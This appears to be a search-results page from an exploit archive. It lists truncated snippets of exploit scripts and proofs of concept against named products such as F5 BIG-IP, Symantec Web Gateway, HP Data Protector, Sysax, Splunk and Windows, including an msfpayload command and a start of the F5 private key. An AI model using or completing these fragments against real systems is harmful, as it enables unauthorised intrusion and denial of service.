1321 matches found
Broadcom DoS on BCM4325 and BCM4329 Devices
Exploit for hardware platform in category dos / poc Exploit Author: CoreLabs Core Security Technologies, was discovered by the Argentine researcher Andrés Blanco, Vendor Homepage: Software Link: download link if available Version: 1.0 Tested on: Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HT...
ActFax Server 4.31 Build 0225 - Local Privilege Escalation
#!/usr/bin/python Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html msfpayload windows/exec CMD=cmd.exe R | msfencode -e...
Symantec Web Gateway 5.0.3.18 Password Change
#!/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit(0) ip = sys.argv[1] username = sys.argv[2] password = sys.argv[3] url = "https://%s/spywall/temppassword.php" % ip opts = {'target':'executivesummary.php', 'USERNAME':username,...
Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
Exploit for linux platform in category web applications #!/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit(0) ip = sys.argv[1] username = sys.argv[2] password = sys.argv[3] url = "https://%s/spywall/temppassword.php" % ip opts =...
HP Data Protector Client 6.11 / 6.20 Remote Code Execution
#!/usr/bin/env python Exploit Title: HP Data Protector Client EXECCMD Remote Code Execution Vulnerability Date: 2012-12-06 Exploit Author: Ben Turner Vendor Homepage: www.hp.com Version: 6.11 & 6.20 Tested on: Windows 2003 Server SP2 en CVE: CVE-2011-0922 Notes: ZDI-11-056 Reference:...
F5 BIG-IP - Authentication Bypass
#!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file("priv.key", "w")...
F5 BIG-IP - Authentication Bypass
#!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file("priv.key", "w") filewrite.write("""-----BEGIN RSA PRIVATE KEY-----...
F5 BIG-IP Remote Root Authentication Bypass
#!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file("priv.key", "w") filewrite.write("""-----BEGIN RSA PRIVATE KEY-----...
Heap spraying Adobe Illustrator
Given the recently patched vulnerabilities in Adobe Illustrator (CVE-2012-2023, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026), it becomes interesting to analyze the exploitability of the .ai file format. Early versions of the AI file format are true EPS files with a restricted, compact synta...
HT Editor Spawning Root Shell
Exploit for linux platform in category remote exploits #!/usr/bin/python Exploit Title: HT Editor Spawning Root Shell Date: 29-Mar-2012 Author: blusp10it Version: 2.0.18 Download: http://sourceforge.net/projects/hte/files/ht-source/ht-2.0.18.tar.gz Tested on: BackTrack 4 R2, Ubuntu 10.04 Run with:...
Sysax Multi Server 5.53 - SFTP (Authenticated) (SEH)
#!/usr/bin/python Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit Egghunter Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Software Versions Tested: 5.53 Date Discovered: February 22, 2012 Vendor Contacted: February 23, 2012 Vendor Response: February 27, 2012 Vendor Fix: Version 5.55...
DPScan : Drupal Security Scanner Released
The first security scanner for Drupal CMS has been released by Ali Elouafiq on his blog. His team developed a tool that will enumerate at least the modules used by Drupal so we can simulate a white-box audit on our private machines. This small tool is publ...
Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)
#!/usr/bin/python Title: Sysax Multi Server " sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] password = sys.argv[4] opersys = sys.argv[5] base64 encode the provided creds creds =...
Microsoft Windows - Assembly Execution (MS12-005)
Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE :...
Microsoft Windows - Assembly Execution (MS12-005)
Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE : CVE-2012-0013 PoC:...
PHP Hash Table Collision - Denial of Service (PoC)
#!/usr/bin/env python """ This script was written by Christian Mehlmauer https://twitter.com/#!/FireFart Sourcecode online at: https://github.com/FireFart/HashCollision-DOS-POC Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision...
TFTP-Server-1.4ST
A stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a DoS or execute arbitrary code via a long filename in a read or write request. The vulnerability is caused by a boundary error in the handling of filenames and can be exploited to cause a stack-base...
Splunk Remote Root Exploit
Exploit for multiple platform in category remote exploits from sec1httplib.requestbuilder import Requestobj from sec1httplib.threaddispatcher import * import threading import re import urlparse import sys import urllib import base64 from optparse import OptionParser import sys """ Source:...
Google Chrome PoC, killing thread
No description provided by source. pigtail23 www.remoteshell.de ...
Google Chrome - Killing Thread (PoC)
pigtail23 www.remoteshell.de October 22, 2011 Ohh nice! What u doing google? Thx 4 ur bug! 0o Google Chrome PoC, killing thread. Exploitable o...